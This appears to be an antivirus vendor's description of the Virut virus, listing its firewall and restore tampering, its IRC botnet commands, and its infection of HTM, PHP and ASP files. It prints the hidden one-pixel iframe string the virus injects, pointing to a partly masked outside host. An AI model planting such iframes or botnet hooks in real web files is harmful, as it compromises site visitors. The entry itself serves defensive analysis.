Virus.Win32.Virut

Detect Date 10/23/2007
Class Virus
Platform Win32
Description

The virus adds the executable file of the host process to the Windows firewall list of trusted applications.

Then it disables the “Restore system files” function.

The virus attempts to contact the following IRC servers:




prox*****ircgalaxy.pl



irc*****ef.pl



If a connection is established, the virus sends the following commands to the server:




NICK dewxxpyi



USER b



JOIN #.<rnd1>, where rnd1 is a random number.



Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.

The virus is capable of executing the following commands:

  • !Get: download a malicious code from the Internet and inject it into processes running on the victim computer.
  • !hosu: open specified URLs on the victim computer.

The virus also scans the victim computer’s hard drive for files with the following extensions:




HTM



PHP



ASP



If found, it adds the following string into them:

<iframe src=”http://****.pl/rc/” width=1 height=1
style=”border:0″></iframe>